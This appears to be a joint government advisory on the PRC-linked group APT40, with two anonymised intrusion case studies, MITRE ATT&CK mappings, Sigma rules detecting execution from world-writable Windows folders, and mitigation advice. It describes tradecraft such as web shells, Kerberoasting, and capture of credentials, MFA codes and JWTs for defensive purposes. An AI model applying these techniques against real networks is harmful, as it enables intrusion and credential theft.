The PRC state-sponsored cyber group has previously targeted organizations in various countries, including Australia and the United States, and the techniques highlighted below are regularly used by other PRC state-sponsored actors globally. Therefore, the authoring agencies believe the group, and similar techniques remain a threat to their countries’ networks as well.

The authoring agencies assess that this group conduct malicious cyber operations for the PRC Ministry of State Security (MSS). The activity and techniques overlap with the groups tracked as Advanced Persistent Threat (APT) 40 (also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk in industry reporting). This group has previously been reported as being based in Haikou, Hainan Province, PRC and receiving tasking from the PRC MSS, Hainan State Security Department.[1]

The following Advisory provides a sample of significant case studies of this adversary’s techniques in action against two victim networks. The case studies are consequential for cybersecurity practitioners to identify, prevent and remediate APT40 intrusions against their own networks. The selected case studies are those where appropriate remediation has been undertaken reducing the risk of re-exploitation by this threat actor, or others. As such, the case studies are naturally older in nature, to ensure organizations were given the necessary time to remediate.

APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing. The tradecraft described in this advisory is regularly observed against Australian networks.

Notably, APT40 possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability. APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.

APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207CVE-2021-34523CVE-2021-34473). ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.

This group appears to prefer exploiting vulnerable, public-facing infrastructure over techniques that require user interaction, such as phishing campaigns, and places a high priority on obtaining valid credentials to enable a range of follow-on activities. APT40 regularly uses web shells [T1505.003] for persistence, particularly early in the life cycle of an intrusion. Typically, after successful initial access APT40 focuses on establishing persistence to maintain access on the victim’s environment. However, as persistence occurs early in an intrusion, it is more likely to be observed in all intrusions—regardless of the extent of compromise or further actions taken.

Although APT40 has previously used compromised Australian websites as command and control (C2) hosts for its operations, the group have evolved this technique [T1594].

APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements.

Many of these SOHO devices are end-of-life or unpatched and offer a soft target for N-day exploitation. Once compromised, SOHO devices offer a launching point for attacks that is designed to blend in with legitimate traffic and challenge network defenders [T1001.003].

APT40 does occasionally use procured or leased infrastructure as victim-facing C2 infrastructure in its operations; however, this tradecraft appears to be in relative decline.

ASD’s ACSC are sharing some of the malicious files identified during the investigations outlined below. These files have been uploaded to VirusTotal to enable the wider network defense and cyber security communities to better understand the threats they need to defend against.

ASD’s ACSC are sharing two anonymized investigative reports to provide awareness of how the actors employ their tools and tradecraft.

Executive Summary

This report details the findings of the ASD’s ACSC investigation into the successful compromise of the organization’s network between July and September 2022. This investigative report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40.

In mid-August, the ASD’s ACSC notified the organization of malicious interactions with their network from a likely compromised device being used by the group in late August and, with the organization’s consent, the ASD’s ACSC deployed host-based sensors to likely affected hosts on the organization’s network. These sensors allowed ASD’s ACSC incident response analysts to undertake a thorough digital forensics investigation. Using available sensor data, the ASD’s ACSC analysts successfully mapped the group’s activity and created a detailed timeline of observed events.

From July to August, key actor activity observed by the ASD’s ACSC included:

  • Host enumeration, which enables an actor to build their own map of the network;
  • Web shell use, giving the actor an initial foothold on the network and a capability to execute commands; and
  • Deployment of other tooling leveraged by the actor for malicious purposes.

The investigation uncovered evidence of large amounts of sensitive data being accessed and evidence that the actors moved laterally through the network [T1021.002]. Much of the compromise was facilitated by the group’s establishment of multiple access vectors into the network, the network having a flat structure, and the use of insecure internally developed software that could be used to arbitrarily upload files. Exfiltrated data included privileged authentication credentials that enabled the group to log in, as well as network information that would allow the actors to regain unauthorized access if the original access vector was blocked. No additional malicious tooling was discovered beyond those on the initially exploited machine; however, a group’s access to legitimate and privileged credentials would negate the need for additional tooling. Findings from the investigation indicate the organization was likely deliberately targeted by APT40, as opposed to falling victim opportunistically to a publicly known vulnerability.

Investigation Findings

In mid-August 2022, the ASD’s ACSC notified the organization that a confirmed malicious IP believed to be affiliated with a state-sponsored cyber group had interacted with the organization’s computer networks between at least July and August. The compromised device probably belonged to a small business or home user.

In late August, the ASD’s ACSC deployed a host-based agent to hosts on the organization’s network which showed evidence of having been impacted by the compromise.

Some artefacts which could have supported investigation efforts were not available due to the configuration of logging or network design. Despite this, the organization’s readiness to provide all available data enabled ASD’s ACSC incident responders to conduct comprehensive analysis and to form an understanding of likely APT40 activity on the network.

In September, after consultation with the ASD’s ACSC, the organization decided to denylist the IP identified in the initial notification. In October, the organization commenced remediation.

Details

Beginning in July, actors were able to test and exploit a custom web application [T1190] running on 2-ext, which enables the group to establish a foothold in the network demilitarized zone (DMZ). This was leveraged to enumerate both the network as well as all visible domains. Compromised credentials [T1078.002] were used to query the Active Directory [T1018] and exfiltrate data by mounting file shares [T1039] from multiple machines within the DMZ. The actor carried out a Kerberoasting attack in order to obtain valid network credentials from a server [T1558.003]. The group were not observed gaining any additional points of presence in either the DMZ or the internal network.

Visual Timeline

The below timeline provides a broad overview of the key phases of malicious actor activity observed on the organization’s network.

Detailed Timeline

July: The actors established an initial connection to the front page of a custom web application [T1190] built for the organization (hereafter referred to as the “web application” or “webapp”) via a transport layer security (TLS) connection [T1102]. No other noteworthy activity was observed.

July: The actors begin enumerating the web application’s website looking for endpoints[2] to further investigate.

July: The actors concentrate on attempts to exploit a specific endpoint.

July: The actors are able to successfully POST to the web server, probably via a web shell placed on another page. A second IP, likely employed by the same actors, also begins posting to the same URL. The actors created and tested a number of likely web shells. 

The exact method of exploitation is unknown, but it is clear that the specific endpoint was targeted to create files on 2-ext.

ASD’s ACSC believes that the two IP address connections were part of the same intrusion due to their shared interest and initial connections occurring minutes apart.

July: The group continue to conduct host enumeration, looking for privilege escalation opportunities, and deploying a different web shell. The actors log into the web application using compromised credentials for @.

The actors’ activity does not appear to have successfully achieved privilege escalation on 2-ext. Instead, the actors pivoted to network-based activity.

July: The actor tests the compromised credentials for a service account[3] which it likely found hardcoded in internally accessible binaries.

July: The actors deploy the open-source tool Secure Socket Funnelling, which was used to connect out to the malicious infrastructure. This connection is employed to tunnel traffic from the actor’s attack machines into the organization’s internal networks, whose machine names are exposed in event logs as they attempt to use the credentials for the service account.

August: The actors are seen conducting a limited amount of activity, including failing to establish connections involving the service account.

August: The actors perform significant network and Active Directory enumeration. A different compromised account is subsequently employed to mount shares[4] on Windows machines within the DMZ, enabling successful data exfiltration.

This seems to be opportunistic usage of a stolen credential on mountable machines in the DMZ. Firewalls blocked the actor from targeting the internal network with similar activity.

August – September: The SSF tool re-established a connection to a malicious IP. The group are not observed performing any additional activities until their access is blocked.

September: The organization blocks the malicious IP by denylisting it on their firewalls.

Actor Tactics and Techniques

The MITRE ATT&CK framework is a documented collection of tactics and techniques employed by threat actors in cyberspace. The framework was created by U.S. not-for-profit The MITRE Corporation and functions as a common global language around threat actor behavior.

The ASD’s ACSC assesses the following techniques and tactics to be relevant to the actor’s malicious activity:

Reconnaissance

T1594 – Search Victim-Owned Websites

The actor enumerated the custom web application’s website to identify opportunities for accessing the network.

Initial Access

T1190 – Exploit Public-Facing Application (regarding exploiting the custom web application)

T1078.002 – Valid Accounts: Domain Accounts (regarding logging on with comprised credentials)

Exploiting internet-exposed custom web applications provided an initial point of access for the actor. The actor was later able to use credentials they had compromised to further their access to the network.

Execution

T1059 – Command and Scripting Interpreter (regarding command execution through the web shell)

T1072 – Software Deployment Tools (regarding the actor using open-source tool Secure Socket Funnelling (SSF) to connect to an IP)

Persistence

T1505.003 – Server Software Component: Web Shell (regarding use of a web shell and SSF to establish access)

Credential Access

T1552.001 – Credentials from Password Stores (regarding password files relating to building management system [BMS])

T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting (regarding attack to gain network credentials)

Lateral movement

T1021.002 – Remote Services: SMB Shares (regarding the actor mounting SMB shares from multiple devices)

Collection

T1213 – Data from Information Repositories (regarding manuals/documentation found on the BMS server)

Exfiltration

T1041 – Exfiltration Over C2 Channel (regarding the actor’s data exfiltration from Active Directory and mounting shares)

Case Study 2

This report has been anonymized to enable wider dissemination. The impacted organization is hereafter referred to as “the organization.” Some specific details have been removed to protect the identity of the victim and incident response methods of ASD’s ACSC.

Executive Summary

This report details the findings of ASD’s ACSC investigation into the successful compromise of the organization’s network in April 2022. This investigation report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40.

In May 2022, ASD’s ACSC notified an organization of suspected malicious activity impacting the organization’s network since April 2022. Subsequently, the organization informed ASD’s ACSC that they had discovered malicious software on an internet‑facing server which provided the login portal for the organization’s corporate remote access solution. This server used a remote access login and identity management product and will be referred to in this report as ‘the compromised appliance’. This report details the investigation findings and remediation advice developed for the organization in response to the investigation conducted by the ASD’s ACSC.

Evidence indicated that part of the organization’s network had been compromised by malicious cyber actor(s) via the organization’s remote access login portal since at least April 2022. This server may have been compromised by multiple actors, and was likely affected by a remote code execution (RCE) vulnerability that was widely publicized around the time of the compromise.

Key actor activity observed by the ASD’s ACSC included:

  • Host enumeration, which enables an actor to build their own map of the network;
  • Exploitation of internet-facing applications and web shell use, giving the actor an initial foothold on the network and a capability to execute commands;
  • Exploitation of software vulnerabilities to escalate privileges; and
  • Credential collection to enable lateral movement.

The ASD’s ACSC discovered that a malicious actor had exfiltrated several hundred unique username and password pairs on the compromised appliance in April 2022, as well as a number of multi-factor authentication codes and technical artefacts related to remote access sessions. Upon a review by the organization, the passwords were found to be legitimate. The ASD’s ACSC assesses that the actor may have collected these technical artefacts to hijack or create a remote login session as a legitimate user, and access the organization’s internal corporate network using a legitimate user account.

Investigation Summary

The ASD’s ACSC determined that the actor compromised appliance(s) which provide remote login sessions for organization staff and used this compromise to attempt to conduct further activity. These appliances consist of three load-balanced hosts where the earliest evidence of compromise was detected. The organization shut down two of the three load-balanced hosts shortly after the initial compromise. As a result, all subsequent activity occurred on a single host. The other servers associated with the compromised appliance were also load-balanced in a similar manner. For legibility, all compromised appliances are referred to in most of this report as a “single appliance.”

The actor is believed to have used publicly known vulnerabilities to deploy web shells to the compromised appliance from April 2022 onwards. Threat actors from the group are assessed to have attained escalated privileges on the appliance. The ASD’s ACSC could not determine the full extent of the activity due to lack of logging availability. However, evidence on the device indicates that an actor achieved the following:

  • The collection of several hundred genuine username and password pairs; and
  • The collection of technical artefacts which may have allowed a malicious actor to access a virtual desktop infrastructure (VDI) session as a legitimate user.

The ASD’s ACSC assesses that the actor would have sought to further the compromise of the organisation network. The artefacts exfiltrated by the actor may have allowed them to hijack or initiate virtual desktop sessions as a legitimate user, possibly as a user of their choice, including administrators. The actor may have used this access vector to further compromise organization services to achieve persistence and other goals.

Other organization appliances within the hosting provider managed environment did not show evidence of compromise.

Access

The host with the compromised appliance provided authentication via Active Directory and a webserver, for users connecting to VDI sessions [T1021.001].

Location Compromised appliance hostnames (load-balanced)
Datacentre 1 HOST1, HOST2, HOST3

The appliance infrastructure also included access gateway hosts that provide a tunnel to the VDI for the user, once they possess an authentication token generated and downloaded from the appliance.

There was no evidence of compromise of any of these hosts. However, the access gateway hosts logs showed evidence of significant interactions with known malicious IP addresses. It is likely that this reflected activity that occurred on this host, or network connections with threat actor infrastructure that reached this host. The nature of this activity could not be determined using available evidence but indicates that the group sought to move laterally in the organization’s network [TA0008].

Internal Hosts

The ASD’s ACSC investigated limited data from the internal organization’s network segment. Attempted or successful malicious activity known to have impacted the internal organization’s network segment includes actor access to VDI-related artefacts, the scraping of an internal SQL server [T1505.001], and unexplained traffic observed going from known malicious IP addresses through the access gateway appliances [TA0011].

Using their access to the compromised appliance, the group collected genuine usernames, passwords [T1003], and MFA token values [T1111]. The group also collected JSON Web Tokens (JWTs) [T1528], which is an authentication artefact used to create virtual desktop login sessions. The actor may have been able to use these to create or hijack virtual desktop sessions [T1563.002] and access the internal organization network segment as a legitimate user [T1078].

The actor also used access to the compromised appliance to scrape an SQL server [T1505.001], which resided in the organization’s internal network. It is likely that the actor had access to this data.

Evidence available from the access gateway appliance revealed that network traffic occurred through or to this device from known malicious IP addresses. As described above, this may indicate that malicious cyber actors impacted or utilized this device, potentially to pivot into the internal network.

Investigation Timeline

The below list provides a timeline of key activities discovered during the investigation.

Time Event
April 2022 Known malicious IP addresses interact with access gateway host HOST7. The nature of the interactions could not be determined.
April 2022

All hosts, HOST1, HOST2 and HOST3, were compromised by a malicious actor or actors, and web shells were placed on the hosts.

A log file was created or modified on HOST2. This file contains credential material likely captured by a malicious actor.

The /etc/security/opasswd and /etc/shadow files were modified on HOST1 and HOST3, indicating that passwords were changed. Evidence available on HOST1 suggests that the password for user ‘sshuser’ was changed.

April 2022

HOST2 was shut down by the organization.

Additional web shells (T1505.003) were created on HOST1 and HOST3. HOST1experienced SSH brute force attempts from HOST3.

A log file was modified (T1070) on HOST3. This file contains credential material (T1078) likely captured by a malicious actor.

JWTs were captured (T1528) and output to a file on HOST3.

HOST3 was shut down by the organization. All activity after this time occurs on HOST1.

April 2022 Additional web shells were created on HOST1 (T1505.003). JWTs were captured and output to a file on HOST1.
April 2022

Additional web shells are created on HOST1 (T1505.003), and a known malicious IP address interacts with the host (TA0011).

A known malicious IP address interacts with access gateway host HOST7.

May 2022

A known malicious IP address interacted with access gateway host HOST7 (TA0011).

An authentication event for a user is linked to a known malicious IP address in logs on HOST1. An additional web shell is created on this host (T1505.003).

May 2022 A script on HOST1 was modified by an actor (T1543). This script contains functionality which would have scraped data from an internal SQL server.
May 2022 An additional log file on HOST1 was last modified (T1070). This file contains username and password pairs for the organization network, which are believed to be legitimate (T1078).
May 2022 An additional log file was last modified (T1070). This file contains JWTs collected from HOST1.
May 2022 Additional web shells were created on HOST1 (T1505.003). On this date, the organization reported the discovery of a web shell with creation date in April 2022 to ASD’s ACSC
May 2022 A number of scripts were created on HOST1, including one named Log4jHotPatch.jar.
May 2022 The iptables-save command was used to add two open ports to the access gateway host. The ports were 9998 and 9999 (T1572).

Actor Tactics and Techniques

Highlighted below are several tactics and techniques identified during the investigation.

Initial access

T1190 Exploit public facing application

The group likely exploited RCE, privilege escalation, and authentication bypass vulnerabilities in the remote access login and identity management product to gain initial access to the network.

This initial access method is considered the most likely due to the following:

  • The server was vulnerable to these CVEs at the time;
  • Attempts to exploit these vulnerabilities from known actor infrastructure; and
  • The first known internal malicious activity occurred shortly after attempted exploitation attempts were made.

Execution

T1059.004 Command and Scripting Interpreter: Unix Shell

The group successfully exploited the above vulnerabilities may have been able to run commands in a Unix shell available on the affected appliance.

Complete details of the commands run by actors cannot be provided as they were not logged by the appliance.

Persistence

T1505.003 Server Software Component: Web Shell

Actors deployed several web shells on the affected appliance. It is possible that multiple distinct actors deployed web shells, but that only a smaller number of actors conducted activity using these web shells.

Web shells would have allowed for arbitrary command execution by the actor on the compromised appliances.

Privilege escalation

T1068 Exploitation for Privilege Escalation

Available evidence does not describe the level of privilege attained by actors. However, using web shells, the actors would have achieved a level of privilege comparable to that of the web server on the compromised appliance. Vulnerabilities believed to have been present on the compromised appliance

would have allowed the actors to attain root privileges.

Credential access

T1056.003 Input Capture: Web Portal Capture

Evidence on the compromised appliance showed that the actor had captured several hundred username-password pairs, in clear text, which are believed to be legitimate. It is likely that these were captured using some modification to the genuine authentication process which output the credentials to a file.

T1111 Multi-Factor Authentication Interception The actor also captured the value of MFA tokens

corresponding to legitimate logins. These were likely captured by modifying the genuine authentication process to output these values to a file. There is no evidence of compromise of the “secret server’ which stores the unique values that provide for the security of MFA tokens.

T1040 Network Sniffing

The actor is believed to have captured JWTs by capturing HTTP traffic on the compromised appliance. There is evidence that the utility tcpdump was executed on the compromised appliance, which may have been how the actor captured these JWTs.

T1539 Steal Web Session Cookie

As described above, the actor captured JWTs, which are analogous to web session cookies. These could have been reused by the actor to establish further access.

Discovery

T1046 Network Service Discovery

There is evidence that network scanning utility nmap was executed on the compromised appliance to scan other appliances in the same network segment. This was likely used by the actor to discover other reachable network services which might present opportunities for lateral movement.

Collection

Available evidence does not reveal how actors collected data or exactly what was collected from the compromised appliance or from other systems. However, it is likely that actors had access to all files on the compromised appliance, including the captured credentials [T1003], MFA token values [T1111], and JWTs described above.

Command and Control

T1071.001 Application Layer Protocol: Web Protocols

Actors used web shells for command and control. Web shell commands would have been passed over HTTPS using the existing web server on the appliance [T1572].

T1001.003 Data Obfuscation: Protocol Impersonation

Actors used compromised devices as a launching point for attacks that are designed to blend in with legitimate traffic.

Detection and mitigation recommendations

The ASD’s ACSC strongly recommends implementing the ASD Essential Eight Controls and associated Strategies to Mitigate Cyber Security Incidents. Below are recommendations for network security actions that should be taken to detect and prevent intrusions by APT40, followed by specific mitigations for four key TTPs summarized in Table 1.

Detection

Some of the files identified above were dropped in locations such as C:\Users\Public\* and C:\Windows\ Temp\*. These locations can be convenient spots for writing data as they are usually world writable, that is, all user accounts registered in Windows have access to these directories and their subdirectories. Often, any user can subsequently access these files, allowing opportunities for lateral movement, defense evasion, low-privilege execution and staging for exfiltration.

The following Sigma rules look for execution from suspicious locations as an indicator of anomalous activity. In all instances, subsequent investigation is required to confirm malicious activity and attribution.

Title: World Writable Execution – Temp

ID: d2fa2d71-fbd0-4778-9449-e13ca7d7505c

Description: Detect process execution from C:\ Windows\Temp.

Background: This rule looks specifically for execution out of C:\ Windows\Temp\*. Temp is more broadly used by benign applications and thus a lower confidence malicious indicator than execution out of other world writable subdirectories in C:\Windows.

Removing applications executed by the SYSTEM or NETWORK SERVICE users substantially reduces the quantity of benign activity selected by this rule.

This means that the rule may miss malicious executions at a higher privilege level but it is recommended to use other rules to determine if a user is attempting to elevate privileges to SYSTEM.

Investigation:

  1. Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file.
  2. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious.
  3. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.

References:

Process Execution from an Unusual Directory

Author: ASD’s ACSC

Date: 2024/06/19

Status: experimental

Tags:

  • tlp.green
  • classification.au.official
  • attack.execution

Log Source:

category: process_creation
product: windows

Detection:

temp:
Image|startswith: ‘C:\\Windows\\Temp\\’

common_temp_path:
Image|re|ignorecase: ‘C:\\Windows\\Temp\\\{[a-fA-F0-9]{8}-([a-fA-F0-9]{4}-){3}[a-fA-F0-9]{12}\}\\’

system_user:
User:

  • ‘SYSTEM’
  • ‘NETWORK SERVICE’

dismhost:

  • Image|endswith: ‘dismhost.exe’ 

known_parent:

  • ParentImage|endswith:
  • ‘\\esif_uf.exe’ 
  • ‘\\vmtoolsd.exe’ 
  • ‘\\cwainstaller.exe’
  • ‘\\trolleyexpress.exe’

condition: temp and not (common_temp_path or system_user or dismhost or known_parent)

False positives:

  • Allowlist auditing applications have been observed running executables from Temp.
  • Temp will legitimately contain an array of setup applications and launchers, so it will be worth considering how prevalent this behavior is on a monitored network (and whether or not it can be allowlisted) before deploying this rule.

Level: low

Title: World Writable Execution – Non-Temp System Subdirectory

ID: 5b187157-e892-4fc9-84fc-aa48aff9f997

Description: Detect process execution from a world writable location in a subdirectory of the Windows OS install location.

Background:

This rule looks specifically for execution out of world writable directories within C:\ and particularly C:\Windows\*, with the exception of C:\Windows\Temp (which is more broadly used by benign applications and thus a lower confidence malicious indicator).

AppData folders are excluded if a file is run as SYSTEM – this is a benign way in which many temporary application files are executed.

After completing an initial network baseline and identifying known benign executions from these locations, this rule should rarely fire.

Investigation:

  1. Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file.
  2. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious.
  3. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.

References:

mattifestation / WorldWritableDirs.txt
Process Execution from an Unusual Directory

Author: ASD’s ACSC

Date: 2024/06/19

Status: experimental

Tags:

  • tlp.green
  • classification.au.official
  • attack.execution

Log source:

category: process_creation
product: windows

Detection:

writable_path:
Image|contains:

  • ‘:\\$Recycle.Bin\\’
  • ‘:\\AMD\\Temp\\’
  • ‘:\\Intel\\’
  • ‘:\\PerfLogs\\’
  • ‘:\\Windows\\addins\\’
  • ‘:\\Windows\\appcompat\\’
  • ‘:\\Windows\\apppatch\\’
  • ‘:\\Windows\\AppReadiness\\’
  • ‘:\\Windows\\bcastdvr\\’
  • ‘:\\Windows\\Boot\\’
  • ‘:\\Windows\\Branding\\’
  • ‘:\\Windows\\CbsTemp\\’
  • ‘:\\Windows\\Containers\\’
  • ‘:\\Windows\\csc\\’
  • ‘:\\Windows\\Cursors\\’
  • ‘:\\Windows\\debug\\’
  • ‘:\\Windows\\diagnostics\\’
  • ‘:\\Windows\\DigitalLocker\\’
  • ‘:\\Windows\\dot3svc\\’
  • ‘:\\Windows\\en-US\\’
  • ‘:\\Windows\\Fonts\\’
  • ‘:\\Windows\\Globalization\\’
  • ‘:\\Windows\\Help\\’
  • ‘:\\Windows\\IdentityCRL\\’
  • ‘:\\Windows\\IME\\’
  • ‘:\\Windows\\ImmersiveControlPanel\\’
  • ‘:\\Windows\\INF\\’
  • ‘:\\Windows\\intel\\’
  • ‘:\\Windows\\L2Schemas\\’
  • ‘:\\Windows\\LiveKernelReports\\’
  • ‘:\\Windows\\Logs\\’
  • ‘:\\Windows\\media\\’
  • ‘:\\Windows\\Migration\\’
  • ‘:\\Windows\\ModemLogs\\’
  • ‘:\\Windows\\ms\\’
  • ‘:\\Windows\\OCR\\’
  • ‘:\\Windows\\panther\\’
  • ‘:\\Windows\\Performance\\’
  • ‘:\\Windows\\PLA\\’
  • ‘:\\Windows\\PolicyDefinitions\\’
  • ‘:\\Windows\\Prefetch\\’
  • ‘:\\Windows\\PrintDialog\\’
  • ‘:\\Windows\\Provisioning\\’
  • ‘:\\Windows\\Registration\\CRMLog\\’
  • ‘:\\Windows\\RemotePackages\\’
  • ‘:\\Windows\\rescache\\’
  • ‘:\\Windows\\Resources\\’
  • ‘:\\Windows\\SchCache\\’
  • ‘:\\Windows\\schemas\\’
  • ‘:\\Windows\\security\\’
  • ‘:\\Windows\\ServiceState\\’
  • ‘:\\Windows\\servicing\\’
  • ‘:\\Windows\\Setup\\’
  • ‘:\\Windows\\ShellComponents\\’
  • ‘:\\Windows\\ShellExperiences\\’
  • ‘:\\Windows\\SKB\\’
  • ‘:\\Windows\\TAPI\\’
  • ‘:\\Windows\\Tasks\\’
  • ‘:\\Windows\\TextInput\\’
  • ‘:\\Windows\\tracing\\’
  • ‘:\\Windows\\Vss\\’
  • ‘:\\Windows\\WaaS\\’
  • ‘:\\Windows\\Web\\’
  • ‘:\\Windows\\wlansvc\\’
  • ‘:\\Windows\\System32\\Com\\dmp\\’
  • ‘:\\Windows\\System32\\FxsTmp\\’
  • ‘:\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\’
  • ‘:\\Windows\\System32\\Speech\\’
  • ‘:\\Windows\\System32\\spool\\drivers\\color\\’
  • ‘:\\Windows\\System32\\spool\\PRINTERS\\’
  • ‘:\\Windows\\System32\\spool\\SERVERS\\’
  • ‘:\\Windows\\System32\\Tasks_Migrated\\Microsoft\\Windows\\PLA\\System\\’
  • ‘:\\Windows\\System32\\Tasks\\’
  • ‘:\\Windows\\SysWOW64\\Com\\dmp\\’
  • ‘:\\Windows\\SysWOW64\\FxsTmp\\’
  • ‘:\\Windows\\SysWOW64\\Tasks\\’

appdata:
Image|contains: ‘\\AppData\\’
User: ‘SYSTEM’
condition: writable_path and not appdata

False positives:

Allowlist auditing applications have been observed running executables from these directories.

It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in one of these directories and should be addressed on a case-by-case basis.

Level: high

Title: World Writable Execution – Users

ID: 6dda3843-182a-4214-9263-925a80b4c634

Description: Detect process execution from C:\Users\Public\* and other world writable folders within Users.

Background:

AppData folders are excluded if a file is run as SYSTEM – this is a benign way in which many temporary application files are executed.

Investigation:

  1. Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file.
  2. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious.
  3. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.

References:

Process Execution from an Unusual Directory

Author: ASD’s ACSC

Date: 2024/06/19

Status: experimental

Tags:

  • tlp.green
  • classification.au.official
  • attack.execution

Log source:

category: process_creation
product: windows

Detection:
users:
Image|contains:

  • ‘:\\Users\\All Users\\’
  • ‘:\\Users\\Contacts\\’
  • ‘:\\Users\\Default\\’
  • ‘:\\Users\\Public\\’
  • ‘:\\Users\\Searches\\’

appdata:
Image|contains: ‘\\AppData\\’
User: ‘SYSTEM’
condition: users and not appdata

False positives:

It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in Public or a subdirectory and should be addressed on a case-by-case basis.

Level: medium

Mitigations

Logging

During ASD’s ACSC investigations, a common issue that reduces the effectiveness and speed of investigative efforts is a lack of comprehensive and historical logging information across a number of areas including web server request logs, Windows event logs and internet proxy logs.

ASD’s ACSC recommends reviewing and implementing their guidance on Windows Event Logging and Forwarding including the configuration files and scripts in the Windows Event Logging Repository and the Information Security Manual’s Guidelines for System Monitoring, to include centralizing logs and retaining logs for a suitable period.

Patch Management

Promptly patch all internet exposed devices and services, including web servers, web applications, and remote access gateways. Consider implementing a centralised patch management system to automate and expedite the process. ASD’s ACSC recommend implementation of the ISM’s Guidelines for System Management, specifically, the System Patching controls where applicable.

Most exploits utilized by the actor were publicly known and had patches or mitigations available.

Organizations should ensure that security patches or mitigations are applied to internet facing infrastructure within 48 hours, and where possible, use the latest versions of software and operating systems.

Network Segmentation

Network segmentation can make it significantly more difficult for adversaries to locate and gain access to an organizations sensitive data. Segment networks to limit or block lateral movement by denying traffic between computers unless required. Important servers such as Active Directory and other authentication servers should only be able to be administered from a limited number of intermediary servers or “jump servers.” These servers should be closely monitored, be well secured and limit which users and devices are able to connect to them.

Regardless of instances identified where lateral movement is prevented, additional network segmentation could have further limited the amount of data the actors were able to access and extract.

Additional Mitigations

The authoring agencies also recommend the following mitigations to combat APT40 and others’ use of the TTPs below.

  • Disable unused or unnecessary network services, ports and protocols.
  • Use well-tuned Web application firewalls (WAFs) to protect webservers and applications.
  • Enforce least privilege to limit access to servers, file shares, and other resources.
  • Use multi-factor authentication (MFA) and managed service accounts to make credentials harder to crack and reuse. MFA should be applied to all internet accessible remote access services, including:
    • Web and cloud-based email;
    • Collaboration platforms;
    • Virtual private network connections; and
    • Remote desktop services.
  • Replace end-of-life equipment.
Mitigation Strategies/Techniques
TTP Essential Eight Mitigation Strategies ISM Controls

Initial Access

T1190

Exploitation of Public-Facing Application

  • Patch applications
  • Patch operating systems
  • Multi-factor authentication
  • Application control

ISM-0140

ISM-1698

ISM-1701

ISM-1921

ISM-1876

ISM-1877

ISM-1905

Execution

T1059

Command and Scripting Interpreter

  • Application control
  • Restrict Microsoft Office macros
  • Restrict administrative privileges

ISM-0140

ISM-1490

ISM-1622

ISM-1623

ISM-1657

ISM-1890

Persistence

T1505.003

Server Software Component: Web Shell

  • Application Control
  • Restrict administrative privileges

ISM-0140

ISM-1246

ISM-1746

ISM-1249

ISM-1250

ISM-1490

ISM-1657

ISM-1871

Initial Access / Privilege Escalation / Persistence

T1078

Valid Accounts

  • Patch operating systems
  • Multi-factor authentication
  • Restrict administrative privileges
  • Application control
  • User application hardening

ISM-0140

ISM-0859

ISM-1546

ISM-1504

ISM-1679

For additional general detection and mitigation advice, please consult the Mitigations and Detection sections on the MITRE ATT&CK technique web page for each of the techniques identified in the MITRE ATT&CK summary at the end of this advisory.

Reporting

Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.

Canadian organizations: report incidents by emailing CCCS at [email protected].

New Zealand organizations: report cyber security incidents to [email protected] or call 04 498 7654.

United Kingdom organizations: report a significant cyber security incident at National Cyber Security Centre (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

U.S. organizations: report incidents and anomalous activity to CISA 24/7 Operations Center at [email protected] or (888) 282-0870 and/or to the FBI via your local FBI field office, the FBI’s 24/7 CyWatch at (855) 292-3937, or [email protected]. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.

MITRE ATT&CK – Historical APT40 Tradecraft of Interest

Reconnaissance (TA0043)
Search Victim-Owned Websites [T1594]   Gather Victim Identity Information: Credentials [T1589.001] 
Active Scanning: Vulnerability Scanning [T1595.002]  Gather Victim Host Information [T1592]
Search Open Websites/Domains: Search Engines [T1593.002] Gather Victim Network Information: Domain Properties [T1590.001]
Gather Victim Identity Information: Email Addresses [T1589.002]  
Resource Development (TA0042)
Acquire Infrastructure: Domains [T1583.001]   Acquire Infrastructure [T1583]
Acquire Infrastructure: DNS Server [T1583.002]   Compromise Accounts [T1586]
Develop Capabilities: Code Signing Certificates [T1587.002]  Compromise Infrastructure [T1584]
